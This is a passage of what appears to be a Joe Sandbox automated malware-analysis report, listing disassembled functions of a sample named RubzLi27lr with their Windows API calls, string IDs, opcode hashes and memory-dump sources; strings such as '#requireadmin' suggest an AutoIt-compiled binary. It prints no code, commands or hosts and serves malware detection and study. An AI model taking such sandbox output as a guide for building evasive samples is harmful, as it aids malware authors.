                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long
                                                                                                                  • String ID: SysTreeView32
                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                  • Opcode ID: db98caa7579c16d402068abd705067a4980ace07aafadec759dfbe37a6d9c7a2
                                                                                                                  • Instruction ID: 8ee6f8ec80f60e966c035a73549e4199f64c370a842b72b6f170af6d64aecfd2
                                                                                                                  • Opcode Fuzzy Hash: db98caa7579c16d402068abd705067a4980ace07aafadec759dfbe37a6d9c7a2
                                                                                                                  • Instruction Fuzzy Hash: AD31AF31200205AFDF208E38DC45BDA7BA9EB19334F208715F979932E1DB70ED60A750
                                                                                                                  Function 00B3304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B3335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B33077,?,?), ref: 00B33378
                                                                                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B3307A
                                                                                                                  • _wcslen.LIBCMT ref: 00B3309B
                                                                                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00B33106
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                  • String ID: 255.255.255.255
                                                                                                                  • API String ID: 946324512-2422070025
                                                                                                                  • Opcode ID: 231e1f5dfe7db3d1fd50fa8afe6a977e58e97e3a6a50c008c09b374220189f8c
                                                                                                                  • Instruction ID: cce07b10356463837895356e31491ae69df9352dd240ea8fb1c858cd5300c624
                                                                                                                  • Opcode Fuzzy Hash: 231e1f5dfe7db3d1fd50fa8afe6a977e58e97e3a6a50c008c09b374220189f8c
                                                                                                                  • Instruction Fuzzy Hash: B431B0396042019FCB24CF68C585FAB7BE0EF14718F348099E9169B3A2DB32EE45C760
                                                                                                                  Function 00B43EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B43F40
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B43F54
                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B43F78
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window
                                                                                                                  • String ID: SysMonthCal32
                                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                                  • Opcode ID: 590c6c2bbbdd1d37d55fe9e8f139d1cd99bfc6022ee4829613f364b3b923600b
                                                                                                                  • Instruction ID: f2ed93014ca25514f4d14d475442b018cd34a2ebc6423b64987122a377384771
                                                                                                                  • Opcode Fuzzy Hash: 590c6c2bbbdd1d37d55fe9e8f139d1cd99bfc6022ee4829613f364b3b923600b
                                                                                                                  • Instruction Fuzzy Hash: 3B21BF32600219BBDF118F90CC46FEA3BB9EF48B14F150254FE156B1D0DAB1AA54DB90
                                                                                                                  Function 00B44653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B44705
                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B44713
                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B4471A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                  • String ID: msctls_updown32
                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                  • Opcode ID: 0496fd8310f1ccab373e73696a265c5d483c69a5dd772e08a9d869ed92ff8d07
                                                                                                                  • Instruction ID: 682a99dbecf397f5051b6f01ec5d2a53afb5acef0cf61e8cf17ef058bab1fe1f
                                                                                                                  • Opcode Fuzzy Hash: 0496fd8310f1ccab373e73696a265c5d483c69a5dd772e08a9d869ed92ff8d07
                                                                                                                  • Instruction Fuzzy Hash: AE214CB5601209AFDB10DF68DC81DB637EDEB5A3A4B050499FA149B361CB30ED22DB60
                                                                                                                  Function 00B195AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                  • API String ID: 176396367-2734436370
                                                                                                                  • Opcode ID: 2289542cc83c5f813af3e3d278f4f5b7f8e366b5ededc7f76048eae81b3b997d
                                                                                                                  • Instruction ID: 618b28922f9397318f250575495ed5f0427d4af644d190491bb1fec2d86f0e34
                                                                                                                  • Opcode Fuzzy Hash: 2289542cc83c5f813af3e3d278f4f5b7f8e366b5ededc7f76048eae81b3b997d
                                                                                                                  • Instruction Fuzzy Hash: A021383210429166D331AB249D62FFB73DDEFA2300F904066F95AA7142EB95ADC1D2A5
                                                                                                                  Function 00B437B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B43840
                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B43850
                                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B43876
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                  • String ID: Listbox
                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                  • Opcode ID: 9636d3f2d0dc8bdabaa767504559fcb4fc30e576adb415319367a4da44fe1ef3
                                                                                                                  • Instruction ID: 5c66296ad1f5d86c42130d4426b97107d7d5a81cbfcdf29417443105e949252e
                                                                                                                  • Opcode Fuzzy Hash: 9636d3f2d0dc8bdabaa767504559fcb4fc30e576adb415319367a4da44fe1ef3
                                                                                                                  • Instruction Fuzzy Hash: 7621D472600118BBEF118F54CC81FBB3BEEEF89B50F148154F9449B190CA71DE5297A0
                                                                                                                  Function 00B249F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B24A08
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B24A5C
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B4CC08), ref: 00B24AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                  • String ID: %lu
                                                                                                                  • API String ID: 2507767853-685833217
                                                                                                                  • Opcode ID: 527a0a646a409fdd237f731344478bef7e836de8bdf22e09d3fa44a7b3aaa431
                                                                                                                  • Instruction ID: ef3e1ac42cd677ed683d89904133f6c2a4413189b11a482983498aa963a149ca
                                                                                                                  • Opcode Fuzzy Hash: 527a0a646a409fdd237f731344478bef7e836de8bdf22e09d3fa44a7b3aaa431
                                                                                                                  • Instruction Fuzzy Hash: 4A316275A00119AFDB10DF54C985EAE7BF8EF09308F1480A9F909DB262DB71EE45CB61
                                                                                                                  Function 00B441EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B4424F
                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B44264
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B44271
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: 78b5c4aa044005056e7d24b226a39202d6662b80f26b3e119b98721df45df2b8
                                                                                                                  • Instruction ID: b23e7df56e22950e04573a706885e3936338b5333e29675423fd592eebd809db
                                                                                                                  • Opcode Fuzzy Hash: 78b5c4aa044005056e7d24b226a39202d6662b80f26b3e119b98721df45df2b8
                                                                                                                  • Instruction Fuzzy Hash: 1B11E331250208BEEF205E29CC06FAB3BECEF95B54F014524FA55E60A0D6B1DC21AB10
                                                                                                                  Function 00B12F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                    • Part of subcall function 00B12DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B12DC5
                                                                                                                    • Part of subcall function 00B12DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B12DD6
                                                                                                                    • Part of subcall function 00B12DA7: GetCurrentThreadId.KERNEL32 ref: 00B12DDD
                                                                                                                    • Part of subcall function 00B12DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B12DE4
                                                                                                                  • GetFocus.USER32 ref: 00B12F78
                                                                                                                    • Part of subcall function 00B12DEE: GetParent.USER32(00000000), ref: 00B12DF9
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B12FC3
                                                                                                                  • EnumChildWindows.USER32(?,00B1303B), ref: 00B12FEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                  • String ID: %s%d
                                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                                  • Opcode ID: 4c97085ee1a57384d243d59825fc190ba43a30b8d52531559053fb6c2f2e9683
                                                                                                                  • Instruction ID: 8c081fcd4fdf696d6d9a571c8cfb8733bc7983c01a3c5a9289bab71efbd1e70a
                                                                                                                  • Opcode Fuzzy Hash: 4c97085ee1a57384d243d59825fc190ba43a30b8d52531559053fb6c2f2e9683
                                                                                                                  • Instruction Fuzzy Hash: 4411C0752002056BDF556F60DC99FED37EAAF88704F4480B5B9099B152EE309A858B70
                                                                                                                  Function 00B45882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B458C1
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B458EE
                                                                                                                  • DrawMenuBar.USER32(?), ref: 00B458FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                  • Opcode ID: 4c1b03079adf82d09828998d10eeb071fa5cc17170e0e839c50ee7fe166fefad
                                                                                                                  • Instruction ID: 8fd58a88f3ebabfe09fc27157a84ebd09633947603c53f2d81508a2953381790
                                                                                                                  • Opcode Fuzzy Hash: 4c1b03079adf82d09828998d10eeb071fa5cc17170e0e839c50ee7fe166fefad
                                                                                                                  • Instruction Fuzzy Hash: 55016D31501618EFDB619F11DC85BAEBBB5FB45760F1080D9E849DA252DB308B84EF31
                                                                                                                  Function 00B1007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4682f6f39e84e239b6a2b53a5486de3449a39612ecb3fb66099d2d6dbd3a902
                                                                                                                  • Instruction ID: 5820dcb877ba0103961f5373c366c962c62556d0b320c26d1d841eb350bceca2
                                                                                                                  • Opcode Fuzzy Hash: b4682f6f39e84e239b6a2b53a5486de3449a39612ecb3fb66099d2d6dbd3a902
                                                                                                                  • Instruction Fuzzy Hash: ECC16875A1020AEFCB14DFA4C898AAEB7B5FF48704F608598E515EB251C770EEC1CB90
                                                                                                                  Function 00AE3E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1036877536-0
                                                                                                                  • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                  • Instruction ID: 80773fc32ffb3e1dcf2e349734e610354eaca6776437125c2ccabea395641031
                                                                                                                  • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                  • Instruction Fuzzy Hash: 26A12672D003C69FEB25CF5AC8917AEBBF9EF69350F1442ADE5859B281C2388D41C750
                                                                                                                  Function 00B3342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1998397398-0
                                                                                                                  • Opcode ID: 7260b1f06166447b58176f4a2779fe03171e58634ad2b37c7ad6f3a5d3bc5f9b
                                                                                                                  • Instruction ID: 6840ce9685688a1d0acb0895ca5a7a31902fd707c6d6f175b0eb8e1734d923f9
                                                                                                                  • Opcode Fuzzy Hash: 7260b1f06166447b58176f4a2779fe03171e58634ad2b37c7ad6f3a5d3bc5f9b
                                                                                                                  • Instruction Fuzzy Hash: 28A139756043009FC710DF28C586A6AB7E9FF88714F158999F98A9B362DB70EE01CB91
                                                                                                                  Function 00B10436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B4FC08,?), ref: 00B105F0
                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B4FC08,?), ref: 00B10608
                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00B4CC40,000000FF,?,00000000,00000800,00000000,?,00B4FC08,?), ref: 00B1062D
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00B1064E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314563124-0
                                                                                                                  • Opcode ID: abe7b01e6df3088ce27989d330b55ad2649e90f4493a321e0ea2ae88ec830bfc
                                                                                                                  • Instruction ID: 359f1a14c99a76995eef2787fe626763815e32aae7f9fd3bd1bb28299e38b6f9
                                                                                                                  • Opcode Fuzzy Hash: abe7b01e6df3088ce27989d330b55ad2649e90f4493a321e0ea2ae88ec830bfc
                                                                                                                  • Instruction Fuzzy Hash: 94811B75A10109EFCB04DF94C984EEEB7F9FF89315F204598E506AB250DB71AE86CB60
                                                                                                                  Function 00AF1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: bf7875a7d6f60f401c02425e6455d743cfa6ba7de6f934259b3fd9de78b00a0f
                                                                                                                  • Instruction ID: f9795f071ea85aed73b80d782c52a689e91049754e3cb93d57ab9572cc89473b
                                                                                                                  • Opcode Fuzzy Hash: bf7875a7d6f60f401c02425e6455d743cfa6ba7de6f934259b3fd9de78b00a0f
                                                                                                                  • Instruction Fuzzy Hash: F7414D75A0020CEBDB216BFE9D456BF3AB4EF81771F144226FA1AD7292E634484152B1
                                                                                                                  Function 00B46278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
